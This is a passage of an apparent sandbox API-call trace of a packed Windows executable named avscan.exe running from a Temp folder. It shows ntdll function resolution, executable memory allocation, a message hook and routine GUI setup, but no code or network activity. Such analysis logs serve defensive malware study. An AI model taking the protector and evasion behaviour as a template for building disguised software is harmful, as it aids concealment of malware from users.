0x77a7f8fc [0111.081] GetProcAddress (hModule=0x77a60000, lpProcName="ZwUnmapViewOfSectionEx") returned 0x0 [0111.081] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryDirectoryFileEx") returned 0x0 [0111.081] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationObject") returned 0x77a80154 [0111.081] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWaitForMultipleObjects") returned 0x77a80138 [0111.081] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWaitForSingleObject") returned 0x77a7f8ac [0111.081] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCopyFileChunk") returned 0x0 [0111.081] VirtualFree (lpAddress=0x310000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0111.082] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0111.082] GetProcAddress (hModule=0x77a60000, lpProcName="ZwProtectVirtualMemory") returned 0x77a80028 [0111.082] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0111.082] GetProcAddress (hModule=0x77a60000, lpProcName="ZwClose") returned 0x77a7f9d0 [0111.082] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0111.082] GetProcAddress (hModule=0x77a60000, lpProcName="ZwQueryInformationFile") returned 0x77a7fa00 [0111.082] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0111.082] GetProcAddress (hModule=0x77a60000, lpProcName="ZwSetInformationFile") returned 0x77a7fc28 [0111.082] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0111.083] GetProcAddress (hModule=0x77a60000, lpProcName="ZwFlushBuffersFile") returned 0x77a7ffac [0111.083] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0111.083] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateFile") returned 0x77a800a4 [0111.083] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0111.083] GetProcAddress (hModule=0x77a60000, lpProcName="ZwWriteFile") returned 0x77a7f918 [0111.142] QueryPerformanceCounter (in: lpPerformanceCount=0x28fecc | out: lpPerformanceCount=0x28fecc*=3059197055698) returned 1 [0111.142] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x1) returned 0x320000 [0111.142] SysReAllocStringLen (in: pbstr=0x54bf5c*=0x0, psz="enigma_ide.dll", len=0xe | out: pbstr=0x54bf5c*="enigma_ide.dll") returned 1 [0111.299] GetDC (hWnd=0x0) returned 0x2010928 [0111.299] GetDeviceCaps (hdc=0x2010928, index=90) returned 96 [0111.299] ReleaseDC (hWnd=0x0, hDC=0x2010928) returned 1 [0111.411] GetDC (hWnd=0x0) returned 0x5010ba6 [0111.411] GetDeviceCaps (hdc=0x5010ba6, index=104) returned 0 [0111.411] ReleaseDC (hWnd=0x0, hDC=0x5010ba6) returned 1 [0111.411] CreatePalette (plpal=0x28fac0) returned 0xffffffffe4080bc9 [0111.411] GetStockObject (i=7) returned 0x1b00017 [0111.411] GetStockObject (i=5) returned 0x1900015 [0111.411] GetStockObject (i=13) returned 0x18a002e [0111.411] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0111.411] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11 [0111.624] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x75980000 [0111.676] LoadStringA (in: hInstance=0x42d000, uID=0xff26, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4 [0111.676] LoadStringA (in: hInstance=0x42d000, uID=0xff25, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5 [0111.676] LoadStringA (in: hInstance=0x42d000, uID=0xff24, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6 [0111.676] LoadStringA (in: hInstance=0x42d000, uID=0xff23, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3 [0111.676] LoadStringA (in: hInstance=0x42d000, uID=0xff22, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3 [0111.676] LoadStringA (in: hInstance=0x42d000, uID=0xff21, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4 [0111.676] LoadStringA (in: hInstance=0x42d000, uID=0xff20, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5 [0111.676] LoadStringA (in: hInstance=0x42d000, uID=0xff3f, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2 [0111.677] LoadStringA (in: hInstance=0x42d000, uID=0xff3e, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4 [0111.677] LoadStringA (in: hInstance=0x42d000, uID=0xff3d, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4 [0111.677] LoadStringA (in: hInstance=0x42d000, uID=0xff3c, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3 [0111.677] LoadStringA (in: hInstance=0x42d000, uID=0xff3b, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4 [0111.677] LoadStringA (in: hInstance=0x42d000, uID=0xff3a, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4 [0111.677] LoadStringA (in: hInstance=0x42d000, uID=0xff39, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5 [0111.677] LoadStringA (in: hInstance=0x42d000, uID=0xff38, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5 [0111.677] LoadStringA (in: hInstance=0x42d000, uID=0xff37, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3 [0111.677] LoadStringA (in: hInstance=0x42d000, uID=0xff36, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3 [0111.677] LoadStringA (in: hInstance=0x42d000, uID=0xff35, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4 [0111.943] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc112 [0111.943] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc1be [0111.943] GetCurrentThreadId () returned 0xfd8 [0112.184] GlobalAddAtomA (lpString="EnigmaWndProcPtr0040000000000FD8") returned 0xc163 [0112.236] LoadStringA (in: hInstance=0x42d000, uID=0xfee1, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xfee0, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xfeff, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11 [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xfefe, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8 [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xfefd, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xfefc, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xfefb, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4 [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xfefa, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9 [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xfef9, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xfef8, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9 [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xfef7, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xfef6, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15 [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xfef5, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10 [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xfef4, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xfef3, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xfef2, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14 [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xfef1, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9 [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xfef0, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7 [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xff0f, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xff0e, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xff0d, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xff0c, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10 [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xff0b, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xff0a, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xff09, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15 [0112.237] LoadStringA (in: hInstance=0x42d000, uID=0xff08, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff07, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff06, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff05, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5 [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff04, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8 [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff03, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff02, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5 [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff01, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4 [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff00, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7 [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff1f, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4 [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff1e, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6 [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff1d, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4 [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff1c, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3 [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff1b, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6 [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff1a, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4 [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff19, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4 [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff18, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6 [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff17, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4 [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff16, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5 [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff15, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5 [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff14, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6 [0112.238] LoadStringA (in: hInstance=0x42d000, uID=0xff13, lpBuffer=0x28fabc, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5 [0112.295] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc1bc [0112.295] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc076 [0112.401] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x75410000 [0112.402] GetProcAddress (hModule=0x75410000, lpProcName="InitializeFlatSB") returned 0x7544266f [0112.402] GetProcAddress (hModule=0x75410000, lpProcName="UninitializeFlatSB") returned 0x75442542 [0112.402] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_GetScrollProp") returned 0x75441d29 [0112.402] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_SetScrollProp") returned 0x7544238d [0112.402] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_EnableScrollBar") returned 0x754420c9 [0112.402] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_ShowScrollBar") returned 0x75441fdb [0112.402] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_GetScrollRange") returned 0x75441e8d [0112.402] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_GetScrollInfo") returned 0x75441f0f [0112.403] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_GetScrollPos") returned 0x75441ccd [0112.403] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_SetScrollPos") returned 0x7544216d [0112.403] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_SetScrollInfo") returned 0x754422be [0112.403] GetProcAddress (hModule=0x75410000, lpProcName="FlatSB_SetScrollRange") returned 0x754421e2 [0112.454] GetModuleHandleA (lpModuleName="User32.dll") returned 0x75980000 [0112.455] GetProcAddress (hModule=0x75980000, lpProcName="SetLayeredWindowAttributes") returned 0x759bec88 [0112.455] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc075 [0112.682] GetVersion () returned 0x1db10106 [0112.682] GetCurrentProcessId () returned 0xfd4 [0115.872] GlobalAddAtomA (lpString="EnigmaDelphi00000FD4") returned 0xc162 [0115.872] GetCurrentThreadId () returned 0xfd8 [0115.872] GlobalAddAtomA (lpString="EnigmaControlOfs0040000000000FD8") returned 0xc161 [0115.872] RegisterClipboardFormatA (lpszFormat="ControlOfs0040000000000FD8") returned 0xc1d5 [0115.873] GetProcAddress (hModule=0x75980000, lpProcName="GetMonitorInfoA") returned 0x759a4413 [0115.873] GetProcAddress (hModule=0x75980000, lpProcName="GetSystemMetrics") returned 0x75997d2f [0115.873] GetSystemMetrics (nIndex=19) returned 1 [0115.903] GetSystemMetrics (nIndex=75) returned 1 [0115.903] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x333188c, fWinIni=0x0 | out: pvParam=0x333188c) returned 1 [0116.144] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0116.144] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0116.144] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ff9) returned 0x0 [0116.145] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b [0116.145] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019 [0116.145] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017 [0116.145] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffa) returned 0x0 [0116.146] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffb) returned 0x0 [0116.146] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffc) returned 0x0 [0116.146] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffd) returned 0x0 [0116.146] LoadCursorA (hInstance=0x400000, lpCursorName=0x7fff) returned 0x0 [0116.146] LoadCursorA (hInstance=0x400000, lpCursorName=0x7ffe) returned 0x0 [0116.146] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0116.146] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b [0116.146] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011 [0116.146] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d [0116.147] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013 [0116.147] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f [0116.147] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015 [0116.147] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005 [0116.147] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009 [0116.147] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0116.147] GetKeyboardLayout (idThread=0x0) returned 0x4090409 [0116.147] GetDC (hWnd=0x0) returned 0x5010ba6 [0116.147] GetDeviceCaps (hdc=0x5010ba6, index=90) returned 96 [0116.148] ReleaseDC (hWnd=0x0, hDC=0x5010ba6) returned 1 [0116.148] GetProcAddress (hModule=0x75980000, lpProcName="EnumDisplayMonitors") returned 0x759a451a [0116.148] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x4bd66c, dwData=0x3331ad8) returned 1 [0116.234] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x28fe27, fWinIni=0x0 | out: pvParam=0x28fe27) returned 1 [0116.235] CreateFontIndirectA (lplf=0x28fe27) returned 0x340a0bc6 [0116.309] GetObjectA (in: h=0x340a0bc6, c=60, pv=0x28fc18 | out: pv=0x28fc18) returned 60 [0116.310] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x28fcd3, fWinIni=0x0 | out: pvParam=0x28fcd3) returned 1 [0116.310] CreateFontIndirectA (lplf=0x28fdaf) returned 0xfd0a07ce [0116.310] GetObjectA (in: h=0xfd0a07ce, c=60, pv=0x28fc18 | out: pv=0x28fc18) returned 60 [0116.310] CreateFontIndirectA (lplf=0x28fd73) returned 0xf50a0182 [0116.310] GetObjectA (in: h=0xf50a0182, c=60, pv=0x28fc18 | out: pv=0x28fc18) returned 60 [0116.508] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0 [0116.509] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x28fd87, nSize=0x100 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0116.510] OemToCharA (in: pSrc="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", pDst=0x28fd87 | out: pDst="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 1 [0116.810] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x330000 [0116.815] GetKeyboardLayoutList (in: nBuff=64, lpList=0x28fd08 | out: lpList=0x28fd08) returned 1 [0117.174] GetModuleHandleA (lpModuleName="USER32") returned 0x75980000 [0117.175] GetProcAddress (hModule=0x75980000, lpProcName="AnimateWindow") returned 0x759ab531 [0117.360] SysReAllocStringLen (in: pbstr=0x54d844*=0x0, psz="Help", len=0x4 | out: pbstr=0x54d844*="Help") returned 1 [0117.360] SysReAllocStringLen (in: pbstr=0x54d840*=0x0, psz="YesToAll", len=0x8 | out: pbstr=0x54d840*="YesToAll") returned 1 [0117.361] SysReAllocStringLen (in: pbstr=0x54d83c*=0x0, psz="NoToAll", len=0x7 | out: pbstr=0x54d83c*="NoToAll") returned 1 [0117.361] SysReAllocStringLen (in: pbstr=0x54d838*=0x0, psz="All", len=0x3 | out: pbstr=0x54d838*="All") returned 1 [0117.361] SysReAllocStringLen (in: pbstr=0x54d834*=0x0, psz="Ignore", len=0x6 | out: pbstr=0x54d834*="Ignore") returned 1 [0117.361] SysReAllocStringLen (in: pbstr=0x54d830*=0x0, psz="Retry", len=0x5 | out: pbstr=0x54d830*="Retry") returned 1 [0117.361] SysReAllocStringLen (in: pbstr=0x54d82c*=0x0, psz="Abort", len=0x5 | out: pbstr=0x54d82c*="Abort") returned 1 [0117.361] SysReAllocStringLen (in: pbstr=0x54d828*=0x0, psz="Cancel", len=0x6 | out: pbstr=0x54d828*="Cancel") returned 1 [0117.361] SysReAllocStringLen (in: pbstr=0x54d824*=0x0, psz="OK", len=0x2 | out: pbstr=0x54d824*="OK") returned 1 [0117.361] SysReAllocStringLen (in: pbstr=0x54d820*=0x0, psz="No", len=0x2 | out: pbstr=0x54d820*="No") returned 1 [0117.361] SysReAllocStringLen (in: pbstr=0x54d81c*=0x0, psz="Yes", len=0x3 | out: pbstr=0x54d81c*="Yes") returned 1 [0117.433] GetTickCount () returned 0x1d0922a [0117.433] GetTickCount () returned 0x1d0922a [0117.433] GetCurrentThreadId () returned 0xfd8 [0117.433] SetWindowsHookExW (idHook=3, lpfn=0x4e67b8, hmod=0x0, dwThreadId=0xfd8) returned 0x1602c7 [0117.554] RegisterClipboardFormatA (lpszFormat="TntUnicodeVcl.DestroyWindow") returned 0xc109 [0117.554] VirtualQuery (in: lpAddress=0x4ce37c, lpBuffer=0x28fe64, dwLength=0x1c | out: lpBuffer=0x28fe64*(BaseAddress=0x4ce000, AllocationBase=0x400000, AllocationProtect=0x80, RegionSize=0x6fc000, State=0x1000, Protect=0x40, Type=0x1000000)) returned 0x1c [0117.554] GetCurrentProcessId () returned 0xfd4 [0117.554] GetCurrentThreadId () returned 0xfd8 [0117.554] GlobalAddAtomA (lpString="EnigmaDelphi00000FD4") returned 0xc162 [0117.555] GlobalAddAtomA (lpString="EnigmaControlOfs0040000000000FD8") returned 0xc161 [0117.711] LoadCursorA (hInstance=0x0, lpCursorName=0x7f89) returned 0x1001f [0117.711] DestroyCursor (hCursor=0x0) returned 0 [0117.788] QueryPerformanceCounter (in: lpPerformanceCount=0x28fecc | out: lpPerformanceCount=0x28fecc*=3059861634463) returned 1 [0117.920] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xd0 [0117.920] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xd4 [0118.272] GetLastError () returned 0x0 [0118.272] SetLastError (dwErrCode=0x0) [0118.335] GetLastError () returned 0x0 [0118.335] SetLastError (dwErrCode=0x0) [0118.335] GetLastError () returned 0x0 [0118.335] SetLastError (dwErrCode=0x0) [0118.335] GetLastError () returned 0x0 [0118.335] SetLastError (dwErrCode=0x0) [0118.335] GetLastError () returned 0x0 [0118.336] SetLastError (dwErrCode=0x0) [0118.394] GetLastError () returned 0x0 [0118.394] SetLastError (dwErrCode=0x0) [0118.394] GetLastError () returned 0x0 [0118.394] SetLastError (dwErrCode=0x0) [0118.394] GetLastError () returned 0x0 [0118.394] SetLastError (dwErrCode=0x0) [0118.394] GetLastError () returned 0x0 [0118.395] SetLastError (dwErrCode=0x0) [0118.395] GetLastError () returned 0x0 [0118.395] SetLastError (dwErrCode=0x0) [0118.395] GetLastError () returned 0x0 [0118.395] SetLastError (dwErrCode=0x0) [0118.395] GetLastError () returned 0x0 [0118.395] SetLastError (dwErrCode=0x0) [0118.466] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77a60000 [0118.466] GetLastError () returned 0x0 [0118.467] SetLastError (dwErrCode=0x0) [0118.467] GetLastError () returned 0x0 [0118.467] SetLastError (dwErrCode=0x0) [0118.467] GetLastError () returned 0x0 [0118.467] SetLastError (dwErrCode=0x0) [0118.467] GetLastError () returned 0x0 [0118.467] SetLastError (dwErrCode=0x0) [0118.468] GetLastError () returned 0x0 [0118.468] SetLastError (dwErrCode=0x0) [0118.468] GetLastError () returned 0x0 [0118.468] SetLastError (dwErrCode=0x0) [0118.594] GetLastError () returned 0x0 [0118.594] SetLastError (dwErrCode=0x0) [0118.594] GetLastError () returned 0x0 [0118.594] SetLastError (dwErrCode=0x0) [0118.594] GetLastError () returned 0x0 [0118.594] SetLastError (dwErrCode=0x0) [0118.594] GetLastError () returned 0x0 [0118.594] SetLastError (dwErrCode=0x0) [0118.594] GetLastError () returned 0x0 [0118.595] SetLastError (dwErrCode=0x0) [0118.595] GetLastError () returned 0x0 [0118.595] SetLastError (dwErrCode=0x0) [0118.595] GetLastError () returned 0x0 [0118.595] SetLastError (dwErrCode=0x0) [0118.654] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x340000 [0118.654] GetLastError () returned 0x0 [0118.655] SetLastError (dwErrCode=0x0) [0118.655] GetLastError () returned 0x0 [0118.655] SetLastError (dwErrCode=0x0) [0118.655] GetLastError () returned 0x0 [0118.655] SetLastError (dwErrCode=0x0) [0118.655] GetLastError () returned 0x0 [0118.655] SetLastError (dwErrCode=0x0) [0118.718] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75a80000 [0118.718] GetLastError () returned 0x0 [0118.718] SetLastError (dwErrCode=0x0) [0118.718] GetLastError () returned 0x0 [0118.718] SetLastError (dwErrCode=0x0) [0118.718] GetLastError () returned 0x0 [0118.718] SetLastError (dwErrCode=0x0) [0118.718] GetLastError () returned 0x0 [0118.719] SetLastError (dwErrCode=0x0) [0118.778] GetProcAddress (hModule=0x75a80000, lpProcName="GetProcAddress") returned 0x75a91222 [0118.778] GetLastError () returned 0x0 [0118.778] SetLastError (dwErrCode=0x0) [0118.778] GetLastError () returned 0x0 [0118.779] SetLastError (dwErrCode=0x0) [0118.779] GetLastError () returned 0x0 [0118.779] SetLastError (dwErrCode=0x0) [0118.779] GetLastError () returned 0x0 [0118.779] SetLastError (dwErrCode=0x0) [0118.837] GetLastError () returned 0x0 [0118.838] SetLastError (dwErrCode=0x0) [0118.838] GetLastError () returned 0x0 [0118.838] SetLastError (dwErrCode=0x0) [0118.838] GetLastError () returned 0x0 [0118.838] SetLastError (dwErrCode=0x0) [0118.838] GetLastError () returned 0x0 [0118.838] SetLastError (dwErrCode=0x0) [0118.838] GetLastError () returned 0x0 [0118.838] SetLastError (dwErrCode=0x0) [0118.838] GetLastError () returned 0x0 [0118.838] SetLastError (dwErrCode=0x0) [0118.839] GetLastError () returned 0x0 [0118.839] SetLastError (dwErrCode=0x0) [0118.900] GetLastError () returned 0x0 [0118.900] SetLastError (dwErrCode=0x0) [0118.900] GetLastError () returned 0x0 [0118.900] SetLastError (dwErrCode=0x0) [0118.900] GetLastError () returned 0x0 [0118.901] SetLastError (dwErrCode=0x0) [0118.901] GetLastError () returned 0x0 [0118.901] SetLastError (dwErrCode=0x0) [0118.901] GetLastError () returned 0x0 [0118.901] SetLastError (dwErrCode=0x0) [0118.901] GetLastError () returned 0x0 [0118.901] SetLastError (dwErrCode=0x0) [0118.901] GetLastError () returned 0x0 [0118.901] SetLastError (dwErrCode=0x0) [0118.901] GetLastError () returned 0x0 [0118.902] SetLastError (dwErrCode=0x0) [0118.960] GetLastError () returned 0x0 [0118.960] SetLastError (dwErrCode=0x0) [0118.960] GetProcAddress (hModule=0x77a60000, lpProcName="ZwClose") returned 0x77a7f9d0 [0118.960] GetLastError () returned 0x0 [0118.960] SetLastError (dwErrCode=0x0) [0119.021] GetLastError () returned 0x0 [0119.021] SetLastError (dwErrCode=0x0) [0119.021] GetLastError () returned 0x0 [0119.021] SetLastError (dwErrCode=0x0) [0119.021] GetLastError () returned 0x0 [0119.021] SetLastError (dwErrCode=0x0) [0119.021] GetProcAddress (hModule=0x77a60000, lpProcName="ZwCreateFile") returned 0x77a800a4 [0119.022] GetProcAddress (hModule=0x77a60000, lpProcName="ZwOpenFile") returned 0x77a7fd54 [0119.022] 